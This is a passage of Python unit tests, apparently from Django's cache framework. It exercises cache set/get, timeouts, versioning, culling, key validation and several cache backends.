self.assertEqual(cache.get(key), value)
def test_binary_string(self):
# Binary strings should be cacheable
from zlib import compress, decompress
value = 'value_to_be_compressed'
compressed_value = compress(value.encode())
# Test set
cache.set('binary1', compressed_value)
compressed_result = cache.get('binary1')
self.assertEqual(compressed_value, compressed_result)
self.assertEqual(value, decompress(compressed_result).decode())
# Test add
cache.add('binary1-add', compressed_value)
compressed_result = cache.get('binary1-add')
self.assertEqual(compressed_value, compressed_result)
self.assertEqual(value, decompress(compressed_result).decode())
# Test set_many
cache.set_many({'binary1-set_many': compressed_value})
compressed_result = cache.get('binary1-set_many')
self.assertEqual(compressed_value, compressed_result)
self.assertEqual(value, decompress(compressed_result).decode())
def test_set_many(self):
# Multiple keys can be set using set_many
cache.set_many({"key1": "spam", "key2": "eggs"})
self.assertEqual(cache.get("key1"), "spam")
self.assertEqual(cache.get("key2"), "eggs")
def test_set_many_expiration(self):
# set_many takes a second ``timeout`` parameter
cache.set_many({"key1": "spam", "key2": "eggs"}, 1)
time.sleep(2)
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
def test_delete_many(self):
# Multiple keys can be deleted using delete_many
cache.set("key1", "spam")
cache.set("key2", "eggs")
cache.set("key3", "ham")
cache.delete_many(["key1", "key2"])
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
self.assertEqual(cache.get("key3"), "ham")
def test_clear(self):
# The cache can be emptied using clear
cache.set("key1", "spam")
cache.set("key2", "eggs")
cache.clear()
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
def test_long_timeout(self):
'''
Using a timeout greater than 30 days makes memcached think
it is an absolute expiration timestamp instead of a relative
offset. Test that we honour this convention. Refs #12399.
'''
cache.set('key1', 'eggs', 60 * 60 * 24 * 30 + 1) # 30 days + 1 second
self.assertEqual(cache.get('key1'), 'eggs')
cache.add('key2', 'ham', 60 * 60 * 24 * 30 + 1)
self.assertEqual(cache.get('key2'), 'ham')
cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, 60 * 60 * 24 * 30 + 1)
self.assertEqual(cache.get('key3'), 'sausage')
self.assertEqual(cache.get('key4'), 'lobster bisque')
def test_forever_timeout(self):
'''
Passing in None into timeout results in a value that is cached forever
'''
cache.set('key1', 'eggs', None)
self.assertEqual(cache.get('key1'), 'eggs')
cache.add('key2', 'ham', None)
self.assertEqual(cache.get('key2'), 'ham')
added = cache.add('key1', 'new eggs', None)
self.assertEqual(added, False)
self.assertEqual(cache.get('key1'), 'eggs')
cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, None)
self.assertEqual(cache.get('key3'), 'sausage')
self.assertEqual(cache.get('key4'), 'lobster bisque')
def test_zero_timeout(self):
'''
Passing in zero into timeout results in a value that is not cached
'''
cache.set('key1', 'eggs', 0)
self.assertIsNone(cache.get('key1'))
cache.add('key2', 'ham', 0)
self.assertIsNone(cache.get('key2'))
cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, 0)
self.assertIsNone(cache.get('key3'))
self.assertIsNone(cache.get('key4'))
def test_float_timeout(self):
# Make sure a timeout given as a float doesn't crash anything.
cache.set("key1", "spam", 100.2)
self.assertEqual(cache.get("key1"), "spam")
def _perform_cull_test(self, cull_cache, initial_count, final_count):
# Create initial cache key entries. This will overflow the cache,
# causing a cull.
for i in range(1, initial_count):
cull_cache.set('cull%d' % i, 'value', 1000)
count = 0
# Count how many keys are left in the cache.
for i in range(1, initial_count):
if cull_cache.has_key('cull%d' % i):
count = count + 1
self.assertEqual(count, final_count)
def test_cull(self):
self._perform_cull_test(caches['cull'], 50, 29)
def test_zero_cull(self):
self._perform_cull_test(caches['zero_cull'], 50, 19)
def test_invalid_keys(self):
"""
All the builtin backends (except memcached, see below) should warn on
keys that would be refused by memcached. This encourages portable
caching code without making it too difficult to use production backends
with more liberal key rules. Refs #6447.
"""
# mimic custom ``make_key`` method being defined since the default will
# never show the below warnings
def func(key, *args):
return key
old_func = cache.key_func
cache.key_func = func
try:
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
# memcached does not allow whitespace or control characters in keys
cache.set('key with spaces', 'value')
self.assertEqual(len(w), 2)
self.assertIsInstance(w[0].message, CacheKeyWarning)
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
# memcached limits key length to 250
cache.set('a' * 251, 'value')
self.assertEqual(len(w), 1)
self.assertIsInstance(w[0].message, CacheKeyWarning)
finally:
cache.key_func = old_func
def test_cache_versioning_get_set(self):
# set, using default version = 1
cache.set('answer1', 42)
self.assertEqual(cache.get('answer1'), 42)
self.assertEqual(cache.get('answer1', version=1), 42)
self.assertIsNone(cache.get('answer1', version=2))
self.assertIsNone(caches['v2'].get('answer1'))
self.assertEqual(caches['v2'].get('answer1', version=1), 42)
self.assertIsNone(caches['v2'].get('answer1', version=2))
# set, default version = 1, but manually override version = 2
cache.set('answer2', 42, version=2)
self.assertIsNone(cache.get('answer2'))
self.assertIsNone(cache.get('answer2', version=1))
self.assertEqual(cache.get('answer2', version=2), 42)
self.assertEqual(caches['v2'].get('answer2'), 42)
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertEqual(caches['v2'].get('answer2', version=2), 42)
# v2 set, using default version = 2
caches['v2'].set('answer3', 42)
self.assertIsNone(cache.get('answer3'))
self.assertIsNone(cache.get('answer3', version=1))
self.assertEqual(cache.get('answer3', version=2), 42)
self.assertEqual(caches['v2'].get('answer3'), 42)
self.assertIsNone(caches['v2'].get('answer3', version=1))
self.assertEqual(caches['v2'].get('answer3', version=2), 42)
# v2 set, default version = 2, but manually override version = 1
caches['v2'].set('answer4', 42, version=1)
self.assertEqual(cache.get('answer4'), 42)
self.assertEqual(cache.get('answer4', version=1), 42)
self.assertIsNone(cache.get('answer4', version=2))
self.assertIsNone(caches['v2'].get('answer4'))
self.assertEqual(caches['v2'].get('answer4', version=1), 42)
self.assertIsNone(caches['v2'].get('answer4', version=2))
def test_cache_versioning_add(self):
# add, default version = 1, but manually override version = 2
cache.add('answer1', 42, version=2)
self.assertIsNone(cache.get('answer1', version=1))
self.assertEqual(cache.get('answer1', version=2), 42)
cache.add('answer1', 37, version=2)
self.assertIsNone(cache.get('answer1', version=1))
self.assertEqual(cache.get('answer1', version=2), 42)
cache.add('answer1', 37, version=1)
self.assertEqual(cache.get('answer1', version=1), 37)
self.assertEqual(cache.get('answer1', version=2), 42)
# v2 add, using default version = 2
caches['v2'].add('answer2', 42)
self.assertIsNone(cache.get('answer2', version=1))
self.assertEqual(cache.get('answer2', version=2), 42)
caches['v2'].add('answer2', 37)
self.assertIsNone(cache.get('answer2', version=1))
self.assertEqual(cache.get('answer2', version=2), 42)
caches['v2'].add('answer2', 37, version=1)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertEqual(cache.get('answer2', version=2), 42)
# v2 add, default version = 2, but manually override version = 1
caches['v2'].add('answer3', 42, version=1)
self.assertEqual(cache.get('answer3', version=1), 42)
self.assertIsNone(cache.get('answer3', version=2))
caches['v2'].add('answer3', 37, version=1)
self.assertEqual(cache.get('answer3', version=1), 42)
self.assertIsNone(cache.get('answer3', version=2))
caches['v2'].add('answer3', 37)
self.assertEqual(cache.get('answer3', version=1), 42)
self.assertEqual(cache.get('answer3', version=2), 37)
def test_cache_versioning_has_key(self):
cache.set('answer1', 42)
# has_key
self.assertTrue(cache.has_key('answer1'))
self.assertTrue(cache.has_key('answer1', version=1))
self.assertFalse(cache.has_key('answer1', version=2))
self.assertFalse(caches['v2'].has_key('answer1'))
self.assertTrue(caches['v2'].has_key('answer1', version=1))
self.assertFalse(caches['v2'].has_key('answer1', version=2))
def test_cache_versioning_delete(self):
cache.set('answer1', 37, version=1)
cache.set('answer1', 42, version=2)
cache.delete('answer1')
self.assertIsNone(cache.get('answer1', version=1))
self.assertEqual(cache.get('answer1', version=2), 42)
cache.set('answer2', 37, version=1)
cache.set('answer2', 42, version=2)
cache.delete('answer2', version=2)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertIsNone(cache.get('answer2', version=2))
cache.set('answer3', 37, version=1)
cache.set('answer3', 42, version=2)
caches['v2'].delete('answer3')
self.assertEqual(cache.get('answer3', version=1), 37)
self.assertIsNone(cache.get('answer3', version=2))
cache.set('answer4', 37, version=1)
cache.set('answer4', 42, version=2)
caches['v2'].delete('answer4', version=1)
self.assertIsNone(cache.get('answer4', version=1))
self.assertEqual(cache.get('answer4', version=2), 42)
def test_cache_versioning_incr_decr(self):
cache.set('answer1', 37, version=1)
cache.set('answer1', 42, version=2)
cache.incr('answer1')
self.assertEqual(cache.get('answer1', version=1), 38)
self.assertEqual(cache.get('answer1', version=2), 42)
cache.decr('answer1')
self.assertEqual(cache.get('answer1', version=1), 37)
self.assertEqual(cache.get('answer1', version=2), 42)
cache.set('answer2', 37, version=1)
cache.set('answer2', 42, version=2)
cache.incr('answer2', version=2)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertEqual(cache.get('answer2', version=2), 43)
cache.decr('answer2', version=2)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertEqual(cache.get('answer2', version=2), 42)
cache.set('answer3', 37, version=1)
cache.set('answer3', 42, version=2)
caches['v2'].incr('answer3')
self.assertEqual(cache.get('answer3', version=1), 37)
self.assertEqual(cache.get('answer3', version=2), 43)
caches['v2'].decr('answer3')
self.assertEqual(cache.get('answer3', version=1), 37)
self.assertEqual(cache.get('answer3', version=2), 42)
cache.set('answer4', 37, version=1)
cache.set('answer4', 42, version=2)
caches['v2'].incr('answer4', version=1)
self.assertEqual(cache.get('answer4', version=1), 38)
self.assertEqual(cache.get('answer4', version=2), 42)
caches['v2'].decr('answer4', version=1)
self.assertEqual(cache.get('answer4', version=1), 37)
self.assertEqual(cache.get('answer4', version=2), 42)
def test_cache_versioning_get_set_many(self):
# set, using default version = 1
cache.set_many({'ford1': 37, 'arthur1': 42})
self.assertDictEqual(cache.get_many(['ford1', 'arthur1']),
{'ford1': 37, 'arthur1': 42})
self.assertDictEqual(cache.get_many(['ford1', 'arthur1'], version=1),
{'ford1': 37, 'arthur1': 42})
self.assertDictEqual(cache.get_many(['ford1', 'arthur1'], version=2), {})
self.assertDictEqual(caches['v2'].get_many(['ford1', 'arthur1']), {})
self.assertDictEqual(caches['v2'].get_many(['ford1', 'arthur1'], version=1),
{'ford1': 37, 'arthur1': 42})
self.assertDictEqual(caches['v2'].get_many(['ford1', 'arthur1'], version=2), {})
# set, default version = 1, but manually override version = 2
cache.set_many({'ford2': 37, 'arthur2': 42}, version=2)
self.assertDictEqual(cache.get_many(['ford2', 'arthur2']), {})
self.assertDictEqual(cache.get_many(['ford2', 'arthur2'], version=1), {})
self.assertDictEqual(cache.get_many(['ford2', 'arthur2'], version=2),
{'ford2': 37, 'arthur2': 42})
self.assertDictEqual(caches['v2'].get_many(['ford2', 'arthur2']),
{'ford2': 37, 'arthur2': 42})
self.assertDictEqual(caches['v2'].get_many(['ford2', 'arthur2'], version=1), {})
self.assertDictEqual(caches['v2'].get_many(['ford2', 'arthur2'], version=2),
{'ford2': 37, 'arthur2': 42})
# v2 set, using default version = 2
caches['v2'].set_many({'ford3': 37, 'arthur3': 42})
self.assertDictEqual(cache.get_many(['ford3', 'arthur3']), {})
self.assertDictEqual(cache.get_many(['ford3', 'arthur3'], version=1), {})
self.assertDictEqual(cache.get_many(['ford3', 'arthur3'], version=2),
{'ford3': 37, 'arthur3': 42})
self.assertDictEqual(caches['v2'].get_many(['ford3', 'arthur3']),
{'ford3': 37, 'arthur3': 42})
self.assertDictEqual(caches['v2'].get_many(['ford3', 'arthur3'], version=1), {})
self.assertDictEqual(caches['v2'].get_many(['ford3', 'arthur3'], version=2),
{'ford3': 37, 'arthur3': 42})
# v2 set, default version = 2, but manually override version = 1
caches['v2'].set_many({'ford4': 37, 'arthur4': 42}, version=1)
self.assertDictEqual(cache.get_many(['ford4', 'arthur4']),
{'ford4': 37, 'arthur4': 42})
self.assertDictEqual(cache.get_many(['ford4', 'arthur4'], version=1),
{'ford4': 37, 'arthur4': 42})
self.assertDictEqual(cache.get_many(['ford4', 'arthur4'], version=2), {})
self.assertDictEqual(caches['v2'].get_many(['ford4', 'arthur4']), {})
self.assertDictEqual(caches['v2'].get_many(['ford4', 'arthur4'], version=1),
{'ford4': 37, 'arthur4': 42})
self.assertDictEqual(caches['v2'].get_many(['ford4', 'arthur4'], version=2), {})
def test_incr_version(self):
cache.set('answer', 42, version=2)
self.assertIsNone(cache.get('answer'))
self.assertIsNone(cache.get('answer', version=1))
self.assertEqual(cache.get('answer', version=2), 42)
self.assertIsNone(cache.get('answer', version=3))
self.assertEqual(cache.incr_version('answer', version=2), 3)
self.assertIsNone(cache.get('answer'))
self.assertIsNone(cache.get('answer', version=1))
self.assertIsNone(cache.get('answer', version=2))
self.assertEqual(cache.get('answer', version=3), 42)
caches['v2'].set('answer2', 42)
self.assertEqual(caches['v2'].get('answer2'), 42)
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertEqual(caches['v2'].get('answer2', version=2), 42)
self.assertIsNone(caches['v2'].get('answer2', version=3))
self.assertEqual(caches['v2'].incr_version('answer2'), 3)
self.assertIsNone(caches['v2'].get('answer2'))
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertIsNone(caches['v2'].get('answer2', version=2))
self.assertEqual(caches['v2'].get('answer2', version=3), 42)
self.assertRaises(ValueError, cache.incr_version, 'does_not_exist')
def test_decr_version(self):
cache.set('answer', 42, version=2)
self.assertIsNone(cache.get('answer'))
self.assertIsNone(cache.get('answer', version=1))
self.assertEqual(cache.get('answer', version=2), 42)
self.assertEqual(cache.decr_version('answer', version=2), 1)
self.assertEqual(cache.get('answer'), 42)
self.assertEqual(cache.get('answer', version=1), 42)
self.assertIsNone(cache.get('answer', version=2))
caches['v2'].set('answer2', 42)
self.assertEqual(caches['v2'].get('answer2'), 42)
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertEqual(caches['v2'].get('answer2', version=2), 42)
self.assertEqual(caches['v2'].decr_version('answer2'), 1)
self.assertIsNone(caches['v2'].get('answer2'))
self.assertEqual(caches['v2'].get('answer2', version=1), 42)
self.assertIsNone(caches['v2'].get('answer2', version=2))
self.assertRaises(ValueError, cache.decr_version, 'does_not_exist', version=2)
def test_custom_key_func(self):
# Two caches with different key functions aren't visible to each other
cache.set('answer1', 42)
self.assertEqual(cache.get('answer1'), 42)
self.assertIsNone(caches['custom_key'].get('answer1'))
self.assertIsNone(caches['custom_key2'].get('answer1'))
caches['custom_key'].set('answer2', 42)
self.assertIsNone(cache.get('answer2'))
self.assertEqual(caches['custom_key'].get('answer2'), 42)
self.assertEqual(caches['custom_key2'].get('answer2'), 42)
def test_cache_write_unpicklable_object(self):
update_middleware = UpdateCacheMiddleware()
update_middleware.cache = cache
fetch_middleware = FetchFromCacheMiddleware()
fetch_middleware.cache = cache
request = self.factory.get('/cache/test')
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNone(get_cache_data)
response = HttpResponse()
content = 'Testing cookie serialization.'
response.content = content
response.set_cookie('foo', 'bar')
update_middleware.process_response(request, response)
get_cache_data = fetch_middleware.process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, content.encode('utf-8'))
self.assertEqual(get_cache_data.cookies, response.cookies)
update_middleware.process_response(request, get_cache_data)
get_cache_data = fetch_middleware.process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, content.encode('utf-8'))
self.assertEqual(get_cache_data.cookies, response.cookies)
def test_add_fail_on_pickleerror(self):
# Shouldn't fail silently if trying to cache an unpicklable type.
with self.assertRaises(pickle.PickleError):
cache.add('unpicklable', Unpicklable())
def test_set_fail_on_pickleerror(self):
with self.assertRaises(pickle.PickleError):
cache.set('unpicklable', Unpicklable())
def test_get_or_set(self):
self.assertIsNone(cache.get('projector'))
self.assertEqual(cache.get_or_set('projector', 42), 42)
self.assertEqual(cache.get('projector'), 42)
def test_get_or_set_callable(self):
def my_callable():
return 'value'
self.assertEqual(cache.get_or_set('mykey', my_callable), 'value')
def test_get_or_set_version(self):
cache.get_or_set('brian', 1979, version=2)
with self.assertRaisesMessage(ValueError, 'You need to specify a value.'):
cache.get_or_set('brian')
with self.assertRaisesMessage(ValueError, 'You need to specify a value.'):
cache.get_or_set('brian', version=1)
self.assertIsNone(cache.get('brian', version=1))
self.assertEqual(cache.get_or_set('brian', 42, version=1), 42)
self.assertEqual(cache.get_or_set('brian', 1979, version=2), 1979)
self.assertIsNone(cache.get('brian', version=3))
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.db.DatabaseCache',
# Spaces are used in the table name to ensure quoting/escaping is working
LOCATION='test cache table'
))
class DBCacheTests(BaseCacheTests, TransactionTestCase):
available_apps = ['cache']
def setUp(self):
# The super calls needs to happen first for the settings override.
super(DBCacheTests, self).setUp()
self.create_table()
def tearDown(self):
# The super call needs to happen first because it uses the database.
super(DBCacheTests, self).tearDown()
self.drop_table()
def create_table(self):
management.call_command('createcachetable', verbosity=0, interactive=False)
def drop_table(self):
with connection.cursor() as cursor:
table_name = connection.ops.quote_name('test cache table')
cursor.execute('DROP TABLE %s' % table_name)
def test_zero_cull(self):
self._perform_cull_test(caches['zero_cull'], 50, 18)
def test_second_call_doesnt_crash(self):
out = six.StringIO()
management.call_command('createcachetable', stdout=out)
self.assertEqual(out.getvalue(),
"Cache table 'test cache table' already exists.\n" * len(settings.CACHES))
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.db.DatabaseCache',
# Use another table name to avoid the 'table already exists' message.
LOCATION='createcachetable_dry_run_mode'
))
def test_createcachetable_dry_run_mode(self):
out = six.StringIO()
management.call_command('createcachetable', dry_run=True, stdout=out)
output = out.getvalue()
self.assertTrue(output.startswith("CREATE TABLE"))
def test_createcachetable_with_table_argument(self):
"""
Delete and recreate cache table with legacy behavior (explicitly
specifying the table name).
"""
self.drop_table()
out = six.StringIO()
management.call_command(
'createcachetable',
'test cache table',
verbosity=2,
stdout=out,
)
self.assertEqual(out.getvalue(),
"Cache table 'test cache table' created.\n")
@override_settings(USE_TZ=True)
class DBCacheWithTimeZoneTests(DBCacheTests):
pass
class DBCacheRouter(object):
"""A router that puts the cache table on the 'other' database."""
def db_for_read(self, model, **hints):
if model._meta.app_label == 'django_cache':
return 'other'
return None
def db_for_write(self, model, **hints):
if model._meta.app_label == 'django_cache':
return 'other'
return None
def allow_migrate(self, db, app_label, **hints):
if app_label == 'django_cache':
return db == 'other'
return None
@override_settings(
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.db.DatabaseCache',
'LOCATION': 'my_cache_table',
},
},
)
class CreateCacheTableForDBCacheTests(TestCase):
multi_db = True
@override_settings(DATABASE_ROUTERS=[DBCacheRouter()])
def test_createcachetable_observes_database_router(self):
# cache table should not be created on 'default'
with self.assertNumQueries(0, using='default'):
management.call_command('createcachetable',
database='default',
verbosity=0, interactive=False)
# cache table should be created on 'other'
# Queries:
# 1: check table doesn't already exist
# 2: create savepoint (if transactional DDL is supported)
# 3: create the table
# 4: create the index
# 5: release savepoint (if transactional DDL is supported)
num = 5 if connections['other'].features.can_rollback_ddl else 3
with self.assertNumQueries(num, using='other'):
management.call_command('createcachetable',
database='other',
verbosity=0, interactive=False)
class PicklingSideEffect(object):
def __init__(self, cache):
self.cache = cache
self.locked = False
def __getstate__(self):
if self.cache._lock.active_writers:
self.locked = True
return {}
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.locmem.LocMemCache',
))
class LocMemCacheTests(BaseCacheTests, TestCase):
def setUp(self):
super(LocMemCacheTests, self).setUp()
# LocMem requires a hack to make the other caches
# share a data store with the 'normal' cache.
caches['prefix']._cache = cache._cache
caches['prefix']._expire_info = cache._expire_info
caches['v2']._cache = cache._cache
caches['v2']._expire_info = cache._expire_info
caches['custom_key']._cache = cache._cache
caches['custom_key']._expire_info = cache._expire_info
caches['custom_key2']._cache = cache._cache
caches['custom_key2']._expire_info = cache._expire_info
@override_settings(CACHES={
'default': {'BACKEND': 'django.core.cache.backends.locmem.LocMemCache'},
'other': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'other'
},
})
def test_multiple_caches(self):
"Check that multiple locmem caches are isolated"
cache.set('value', 42)
self.assertEqual(caches['default'].get('value'), 42)
self.assertIsNone(caches['other'].get('value'))
def test_locking_on_pickle(self):
"""#20613/#18541 -- Ensures pickling is done outside of the lock."""
bad_obj = PicklingSideEffect(cache)
cache.set('set', bad_obj)
self.assertFalse(bad_obj.locked, "Cache was locked during pickling")
cache.add('add', bad_obj)
self.assertFalse(bad_obj.locked, "Cache was locked during pickling")
def test_incr_decr_timeout(self):
"""incr/decr does not modify expiry time (matches memcached behavior)"""
key = 'value'
_key = cache.make_key(key)
cache.set(key, 1, timeout=cache.default_timeout * 10)
expire = cache._expire_info[_key]
cache.incr(key)
self.assertEqual(expire, cache._expire_info[_key])
cache.decr(key)
self.assertEqual(expire, cache._expire_info[_key])
# memcached backend isn't guaranteed to be available.
# To check the memcached backend, the test settings file will
# need to contain at least one cache backend setting that points at
# your memcache server.
memcached_params = {}
for _cache_params in settings.CACHES.values():
if _cache_params['BACKEND'].startswith('django.core.cache.backends.memcached.'):
memcached_params = _cache_params
memcached_never_expiring_params = memcached_params.copy()
memcached_never_expiring_params['TIMEOUT'] = None
memcached_far_future_params = memcached_params.copy()
memcached_far_future_params['TIMEOUT'] = 31536000 # 60*60*24*365, 1 year
@unittest.skipUnless(memcached_params, "memcached not available")
@override_settings(CACHES=caches_setting_for_tests(base=memcached_params))
class MemcachedCacheTests(BaseCacheTests, TestCase):
def test_invalid_keys(self):
"""
On memcached, we don't introduce a duplicate key validation
step (for speed reasons), we just let the memcached API
library raise its own exception on bad keys. Refs #6447.
In order to be memcached-API-library agnostic, we only assert
that a generic exception of some kind is raised.
"""
# memcached does not allow whitespace or control characters in keys
self.assertRaises(Exception, cache.set, 'key with spaces', 'value')
# memcached limits key length to 250
self.assertRaises(Exception, cache.set, 'a' * 251, 'value')
# Explicitly display a skipped test if no configured cache uses MemcachedCache
@unittest.skipUnless(
memcached_params.get('BACKEND') == 'django.core.cache.backends.memcached.MemcachedCache',
"cache with python-memcached library not available")
def test_memcached_uses_highest_pickle_version(self):
# Regression test for #19810
for cache_key, cache_config in settings.CACHES.items():
if cache_config['BACKEND'] == 'django.core.cache.backends.memcached.MemcachedCache':
self.assertEqual(caches[cache_key]._cache.pickleProtocol,
pickle.HIGHEST_PROTOCOL)
@override_settings(CACHES=caches_setting_for_tests(base=memcached_never_expiring_params))
def test_default_never_expiring_timeout(self):
# Regression test for #22845
cache.set('infinite_foo', 'bar')
self.assertEqual(cache.get('infinite_foo'), 'bar')
@override_settings(CACHES=caches_setting_for_tests(base=memcached_far_future_params))
def test_default_far_future_timeout(self):
# Regression test for #22845
cache.set('future_foo', 'bar')
self.assertEqual(cache.get('future_foo'), 'bar')
def test_cull(self):
# culling isn't implemented, memcached deals with it.
pass
def test_zero_cull(self):
# culling isn't implemented, memcached deals with it.
pass
def test_memcached_deletes_key_on_failed_set(self):
# By default memcached allows objects up to 1MB. For the cache_db session
# backend to always use the current session, memcached needs to delete
# the old key if it fails to set.
# pylibmc doesn't seem to have SERVER_MAX_VALUE_LENGTH as far as I can
# tell from a quick check of its source code. This is falling back to
# the default value exposed by python-memcached on my system.
max_value_length = getattr(cache._lib, 'SERVER_MAX_VALUE_LENGTH', 1048576)
cache.set('small_value', 'a')
self.assertEqual(cache.get('small_value'), 'a')
large_value = 'a' * (max_value_length + 1)
cache.set('small_value', large_value)
# small_value should be deleted, or set if configured to accept larger values
value = cache.get('small_value')
self.assertTrue(value is None or value == large_value)
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.filebased.FileBasedCache',
))
class FileBasedCacheTests(BaseCacheTests, TestCase):
"""
Specific test cases for the file-based cache.
"""
def setUp(self):
super(FileBasedCacheTests, self).setUp()
self.dirname = tempfile.mkdtemp()
# Caches location cannot be modified through override_settings / modify_settings,
# hence settings are manipulated directly here and the setting_changed signal
# is triggered manually.
for cache_params in settings.CACHES.values():
cache_params.update({'LOCATION': self.dirname})
setting_changed.send(self.__class__, setting='CACHES', enter=False)
def tearDown(self):
super(FileBasedCacheTests, self).tearDown()
# Call parent first, as cache.clear() may recreate cache base directory
shutil.rmtree(self.dirname)
def test_ignores_non_cache_files(self):
fname = os.path.join(self.dirname, 'not-a-cache-file')
with open(fname, 'w'):
os.utime(fname, None)
cache.clear()
self.assertTrue(os.path.exists(fname),
'Expected cache.clear to ignore non cache files')
os.remove(fname)
def test_clear_does_not_remove_cache_dir(self):
cache.clear()
self.assertTrue(os.path.exists(self.dirname),
'Expected cache.clear to keep the cache dir')
def test_creates_cache_dir_if_nonexistent(self):
os.rmdir(self.dirname)
cache.set('foo', 'bar')
os.path.exists(self.dirname)
def test_cache_write_unpicklable_type(self):
# This fails if not using the highest pickling protocol on Python 2.
cache.set('unpicklable', UnpicklableType())
@override_settings(CACHES={
'default': {
'BACKEND': 'cache.liberal_backend.CacheClass',
},
})
class CustomCacheKeyValidationTests(SimpleTestCase):
"""
Tests for the ability to mixin a custom ``validate_key`` method to
a custom cache backend that otherwise inherits from a builtin
backend, and override the default key validation. Refs #6447.
"""
def test_custom_key_validation(self):
# this key is both longer than 250 characters, and has spaces
key = 'some key with spaces' * 15
val = 'a value'
cache.set(key, val)
self.assertEqual(cache.get(key), val)
@override_settings(
CACHES={
'default': {
'BACKEND': 'cache.closeable_cache.CacheClass',
}
}
)
class CacheClosingTests(SimpleTestCase):
def test_close(self):
self.assertFalse(cache.closed)
signals.request_finished.send(self.__class__)
self.assertTrue(cache.closed)
DEFAULT_MEMORY_CACHES_SETTINGS = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'unique-snowflake',
}
}
NEVER_EXPIRING_CACHES_SETTINGS = copy.deepcopy(DEFAULT_MEMORY_CACHES_SETTINGS)
NEVER_EXPIRING_CACHES_SETTINGS['default']['TIMEOUT'] = None
class DefaultNonExpiringCacheKeyTests(SimpleTestCase):
"""Tests that verify that settings having Cache arguments with a TIMEOUT
set to `None` will create Caches that will set non-expiring keys.
This fixes ticket #22085.
"""
def setUp(self):
# The 5 minute (300 seconds) default expiration time for keys is
# defined in the implementation of the initializer method of the
# BaseCache type.
self.DEFAULT_TIMEOUT = caches[DEFAULT_CACHE_ALIAS].default_timeout
def tearDown(self):
del(self.DEFAULT_TIMEOUT)
def test_default_expiration_time_for_keys_is_5_minutes(self):
"""The default expiration time of a cache key is 5 minutes.
This value is defined inside the __init__() method of the
:class:`django.core.cache.backends.base.BaseCache` type.
"""
self.assertEqual(300, self.DEFAULT_TIMEOUT)
def test_caches_with_unset_timeout_has_correct_default_timeout(self):
"""Caches that have the TIMEOUT parameter undefined in the default
settings will use the default 5 minute timeout.
"""
cache = caches[DEFAULT_CACHE_ALIAS]
self.assertEqual(self.DEFAULT_TIMEOUT, cache.default_timeout)
@override_settings(CACHES=NEVER_EXPIRING_CACHES_SETTINGS)
def test_caches_set_with_timeout_as_none_has_correct_default_timeout(self):
"""Memory caches that have the TIMEOUT parameter set to `None` in the
default settings with have `None` as the default timeout.
This means "no timeout".
"""
cache = caches[DEFAULT_CACHE_ALIAS]
self.assertIsNone(cache.default_timeout)
self.assertIsNone(cache.get_backend_timeout())
@override_settings(CACHES=DEFAULT_MEMORY_CACHES_SETTINGS)
def test_caches_with_unset_timeout_set_expiring_key(self):
"""Memory caches that have the TIMEOUT parameter unset will set cache
keys having the default 5 minute timeout.
"""
key = "my-key"
value = "my-value"
cache = caches[DEFAULT_CACHE_ALIAS]
cache.set(key, value)
cache_key = cache.make_key(key)
self.assertIsNotNone(cache._expire_info[cache_key])
@override_settings(CACHES=NEVER_EXPIRING_CACHES_SETTINGS)
def text_caches_set_with_timeout_as_none_set_non_expiring_key(self):
"""Memory caches that have the TIMEOUT parameter set to `None` will set
a non expiring key by default.
"""
key = "another-key"
value = "another-value"
cache = caches[DEFAULT_CACHE_ALIAS]
cache.set(key, value)
cache_key = cache.make_key(key)
self.assertIsNone(cache._expire_info[cache_key])
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix',
CACHE_MIDDLEWARE_SECONDS=1,
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
USE_I18N=False,
)
class CacheUtils(SimpleTestCase):
"""TestCase for django.utils.cache functions."""
def setUp(self):
self.host = 'www.example.com'
self.path = '/cache/test/'
self.factory = RequestFactory(HTTP_HOST=self.host)
def tearDown(self):
cache.clear()
def _get_request_cache(self, method='GET', query_string=None, update_cache=None):
request = self._get_request(self.host, self.path,
method, query_string=query_string)
request._cache_update_cache = True if not update_cache else update_cache
return request
def _set_cache(self, request, msg):
response = HttpResponse()
response.content = msg
return UpdateCacheMiddleware().process_response(request, response)
def test_patch_vary_headers(self):
headers = (
# Initial vary, new headers, resulting vary.
(None, ('Accept-Encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('accept-encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('ACCEPT-ENCODING',), 'Accept-Encoding'),
('Cookie', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
(None, ('Accept-Encoding', 'COOKIE'), 'Accept-Encoding, COOKIE'),
